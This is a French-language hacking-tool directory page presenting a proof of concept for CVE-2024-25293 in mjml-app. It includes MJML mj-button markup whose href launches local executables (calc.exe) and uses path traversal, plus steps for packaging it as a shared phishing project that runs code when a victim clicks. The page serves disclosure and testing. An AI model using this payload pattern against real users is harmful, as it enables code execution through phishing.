Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/eqstlab/cve-2024-25293
Phishing ToolsPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationMisconfiguration
GitHubeqstlab/cve-2024-25293

CVE-2024-25293

mjml-app v3.0.4 & 3.1.0-beta RCE exploit

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Preuve de concept d'exécution de code locale MJML

Une preuve de concept pour la vulnérabilité CVE-2024-25293.

mjml-app v3.0.4 et 3.1.0-beta a été découvert comme contenant une exécution de code à distance (RCE) Dans ce dépôt se trouve un exemple d'application vulnérable et un exploit de preuve de concept (POC).

En tant que POC, il y a un fichier python qui automatise le processus.

1. Aperçu de la vulnérabilité :

  • Sujet de la vulnérabilité : Exécution de code locale
  • Version vulnérable : mjml-app 3.0.4-win & mjml-app 3.1.0-beta
  • Type d'attaque : Exécution de code à distance
  • Composant d'attaque : Dans la balise 'mj-button' du fichier de code source affecté, l'attribut 'href' permet l'exécution de code locale.
  • Numéro CVE réservé : CVE-2024-25293

2. Cause de la vulnérabilité :

  • mjml-app 3.0.4-win & mjml-app 3.1.0 beta souffre d'une mauvaise configuration de sécurité dans la balise 'mj-button', ce qui peut entraîner une exécution de code arbitraire.
  • Explication de l'exploit
    • L'exécution de fichiers locaux via des balises d'événement dans les applications mjml pose une menace de sécurité. De plus, le code peut être exécuté en combinant un Path Traversal dans l'application, nécessitant un correctif. image

Preuve de concept (POC)

Étape 1) L'attaquant crée un 'mj-button' avec une balise 'href' et

  • cas 1) Exécution de code avec Path Traversal (notepad.exe)
  • cas 2) Exécution de code (calc.exe)
root@kitploit:~
<mjml>
  <mj-body>
    <mj-section>
      <mj-column>
        <mj-button background-color="#f45e43" color="white" href="C:\Users\EQST\Desktop\jruru\..\jruru_hacked.txt"> jruru </mj-button>
        <mj-button background-color="#f45e43" color="white" href="C:Windows/System32/calc.exe"> Code Execution </mj-button>
      </mj-column>
    </mj-section>
  </mj-body>
</mjml>

mjml1

Étape 2) L'attaquant crée le projet de phishing principal avec le code suivant.

root@kitploit:~
<!-- header.mjml -->
<mj-section>
  <mj-column>
    <mj-text>This is a demo jruru</mj-text>
  </mj-column>
</mj-section>
<!-- main.mjml -->
<mj-include path="./index.mjml" />

mjml2

Étape 3) La victime ouvre le projet partagé et clique sur le bouton, déclenchant l'exécution du payload (etc., calc, notepad) mjml3


3. Informations supplémentaires

L'exécution de fichiers exe via des balises href dans une application est risquée, et l'exécution de fichiers en combinaison avec Path Traversal est une préoccupation de sécurité. Cela permet de créer et de déployer des projets de phishing pour exécuter des fichiers locaux. Par conséquent, il est essentiel de modifier cette fonctionnalité pour empêcher une telle exécution.

Télécharger l’outil